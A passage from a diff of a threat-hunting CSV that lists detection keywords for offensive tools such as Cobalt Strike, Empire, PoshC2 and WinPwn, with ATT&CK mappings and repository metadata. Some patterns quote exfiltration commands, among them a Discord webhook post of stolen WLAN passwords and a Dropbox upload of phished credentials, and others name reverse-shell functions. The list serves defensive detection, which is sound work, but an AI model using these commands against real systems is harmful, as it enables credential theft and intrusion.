T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Invoke-ReflectivePEInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Invoke-ReflectivePEInjection.ps1*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*Invoke-RefreshToMSGraphToken -domain -ClientId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*Invoke-Reg1c1de*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-RefreshToMSGraphToken -domain -ClientId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Invoke-Reg1c1de*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*Invoke-ReverseSocksProxy*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*invokereverttoself*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-RevertToSelf*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-RevShellServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-Rubeus*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Rubeus*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Rubeus*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Rubeus*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-RunAs.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-RunasCs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*Invoke-RunasCs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*invoke-runaspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-RunningProcessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-S3ssionGoph3r*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-runaspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-RunningProcessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-S3ssionGoph3r*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-S4U-persistence.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*Invoke-SafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-SamBackupFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SauronEye*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SccmCacheFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SauronEye*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SccmCacheFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ScheduledTasksCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ScheduledTasksImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-ScheduledTasksUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-SCMPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ScheduledTasksImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ScheduledTasksUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SCMPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ScriptSentry*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" -"*Invoke-SCShell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SDCLTBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SCShell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SDCLTBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SDPropagator*","offensive_tool_keyword","powershell","propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and forcing ACL changes to propagate may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1","1","1","N/A","N/A","1","57","10","2020-12-29T07:57:54Z","2020-10-14T05:01:51Z" -"*Invoke-Seatbelt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Seatbelt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Seatbelt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Seatbelt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SendMail -Targets*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-SendReverseShell*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-SensitiveHiveFileAccessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-SensitiveHiveShadowCopyCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SensitiveHiveFileAccessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration 